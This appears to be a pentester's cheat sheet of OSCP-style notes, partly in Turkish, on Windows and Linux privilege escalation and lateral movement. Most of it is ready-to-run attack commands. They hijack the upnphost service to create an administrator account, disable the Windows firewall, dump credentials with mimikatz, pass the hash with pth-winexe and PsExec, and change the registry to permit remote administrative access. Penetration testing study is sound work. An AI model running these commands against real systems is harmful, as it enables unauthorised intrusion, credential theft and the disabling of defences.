keepnote

file transfer;

Winpriv check:

https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat

Local Privilege Escalation Abusing Misconfiguration Service (upnphost):

accesschk.exe -uwcqv "Authenticated Users" /accepteula accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula

accesschk.exe -ucqv upnphost sc config upnphost depend= "" sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost sc start upnphost

File Transfer via FTP

ftp > binary

ftp> put /root/Downloads/accesschk.exe accesschk.exe

cadaver http://10.11.1.14/

Python Interactive Shell

pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows: netsh firewall set opmode disable

Referans

priv esc linux - hacking articler (abuse path variable.) https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/

priv esc - cronjob https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/

priv esc - windows - servisler - sc https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

PtH

pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe

via sysinternals tools and mimikatz

  • PtH get user ntlm hash. (via RDP, MSF or other)

mimikatz# privilege::debug 
mimikatz# privilege::minidump FILE.DMP 
mimikatz# sekurlsa::logonpasswords 
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}

then open new cmd. you can run command via psexec.

windows> PsExec.exe \\{IP} cmd

Tip: General usage with password:

PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd

if got "Couldn't access otherComputer: Access is denied." ERROR:

run the following command at target system:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Last updated